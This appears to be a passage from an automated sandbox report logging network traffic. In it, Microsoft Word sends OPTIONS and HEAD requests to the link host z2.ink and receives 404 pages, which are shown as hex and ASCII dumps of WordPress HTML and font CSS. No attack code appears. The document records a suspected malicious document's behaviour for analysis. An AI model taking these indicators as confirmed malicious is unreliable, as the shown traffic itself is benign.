            Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
            May 27, 2024 09:00:28.873028040 CEST1236INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
            Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;
            May 27, 2024 09:00:28.873080969 CEST448INData Raw: 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57
            Data Ascii: play: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;fon
            May 27, 2024 09:00:28.873117924 CEST1236INData Raw: 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e
            Data Ascii: l;font-weight: 600;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style:
            May 27, 2024 09:00:28.873153925 CEST1236INData Raw: 77 38 36 68 64 30 52 6b 38 5a 6b 57 56 34 65 78 67 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d
            Data Ascii: w86hd0Rk8ZkWV4exg.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8
            May 27, 2024 09:00:28.873192072 CEST1236INData Raw: 56 4a 57 55 67 73 6a 5a 30 42 34 75 61 56 51 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74
            Data Ascii: VJWUgsjZ0B4uaVQ.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr
            May 27, 2024 09:00:28.873225927 CEST1236INData Raw: 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68
            Data Ascii: fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch: normal;font-display: swap;src: url(h
            May 27, 2024 09:00:28.873291016 CEST328INData Raw: 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79
            Data Ascii: rl(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: swap;sr
            May 27, 2024 09:00:28.873307943 CEST1236INData Raw: 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 48 31 78 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73
            Data Ascii: yOOSr4dVJWUgsgH1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 700;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj
            May 27, 2024 09:00:28.873346090 CEST1236INData Raw: 6d 2f 73 2f 6d 6f 6e 6f 74 6f 6e 2f 76 31 35 2f 35 68 31 61 69 5a 55 72 4f 6e 67 43 69 62 65 34 54 6b 48 4c 52 41 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c
            Data Ascii: m/s/monoton/v15/5h1aiZUrOngCibe4TkHLRA.woff) format('woff');}/* User Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(
            May 27, 2024 09:00:28.878297091 CEST1236INData Raw: 65 77 3a 6c 61 72 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 63 61 6e 6f 6e 69 63 61 6c 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 3f 70 3d 32 38 22 3e 3c 6d 65 74 61 0a 70 72
            Data Ascii: ew:large"><linkrel=canonical href="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:locale" content="en_US"><metaproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:u


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.224916454.241.153.192801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:29.255786896 CEST128OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:29.836250067 CEST1236INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:29 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
            May 27, 2024 09:00:29.836272955 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
            Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
            May 27, 2024 09:00:29.836309910 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
            Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
            May 27, 2024 09:00:29.836363077 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
            Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
            May 27, 2024 09:00:29.836378098 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
            Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
            May 27, 2024 09:00:29.836446047 CEST1236INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
            Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
            May 27, 2024 09:00:29.836461067 CEST1236INData Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
            Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
            May 27, 2024 09:00:29.836477995 CEST1236INData Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77
            Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
            May 27, 2024 09:00:29.836494923 CEST1236INData Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20
            Data Ascii: &#038;subset=latin&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
            May 27, 2024 09:00:29.836513996 CEST1236INData Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e
            Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
            May 27, 2024 09:00:29.841547966 CEST1236INData Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a
            Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.224916554.241.153.192801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:29.850625992 CEST128OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:30.451380014 CEST1236INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:30 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><htmllang=en-US prefix="og: https://ogp.me/ns#"><head><style>img.lazy{min-height:1px}</style><linkrel=preload href=https://d3btrheyejmivy.cloudfront.net/edge/wp-content/plugins/w3-total-cache/pub/js/lazyload.min.js as=script><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible" content="IE=edge"><linkrel=pingback href=https://face.linksgpt.com/edge/xmlrpc.php> <script>document.documentElement.className = 'js';</script> <linkrel=preconnect href=https://fonts.gstatic.com crossorigin><style id=et-divi-open-sans-inline-css>/*<![CDATA[*//* Original: https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 300;font-stretch: normal;font-display: swap;src: url
            May 27, 2024 09:00:30.451451063 CEST224INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38
            Data Ascii: (https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;
            May 27, 2024 09:00:30.451464891 CEST1236INData Raw: 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69
            Data Ascii: font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exQ.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch:
            May 27, 2024 09:00:30.451479912 CEST1236INData Raw: 73 74 72 65 74 63 68 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76
            Data Ascii: stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVc.ttf) format('truetype');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;
            May 27, 2024 09:00:30.451504946 CEST1236INData Raw: 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68
            Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg.w
            May 27, 2024 09:00:30.451520920 CEST1236INData Raw: 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67
            Data Ascii: format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVQ.wof
            May 27, 2024 09:00:30.451539040 CEST1236INData Raw: 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 35 68 6b 57 56 34 65 77 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
            Data Ascii: ns/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s
            May 27, 2024 09:00:30.451556921 CEST1236INData Raw: 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 69 48 30 42 34 75 61 56 49 2e 77
            Data Ascii: c.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 400;font-stretch: normal;font-display: swap;src: url(https://fonts.gs
            May 27, 2024 09:00:30.451580048 CEST1236INData Raw: 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20
            Data Ascii: &#038;subset=latin&#038;display=swap *//* User Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;s
            May 27, 2024 09:00:30.451597929 CEST1236INData Raw: 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e
            Data Ascii: uery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=func
            May 27, 2024 09:00:30.456495047 CEST1236INData Raw: 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 42 72 61 6e 64 6c 69 6e 6b 20 45 64 67 65 22 3e 3c 6d 65 74 61 0a 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a
            Data Ascii: etaname="twitter:title" content="Not Found - Brandlink Edge"><metaname="twitter:label1" content="Written by"><metaname="twitter:data1" content="tianqi"><metaname="twitter:label2" content="Time to read"><metaname="twitter:data2" content="L


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.224916654.241.153.192801668C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            May 27, 2024 09:00:30.543694019 CEST111OUTHEAD /nLNG HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: z2.ink
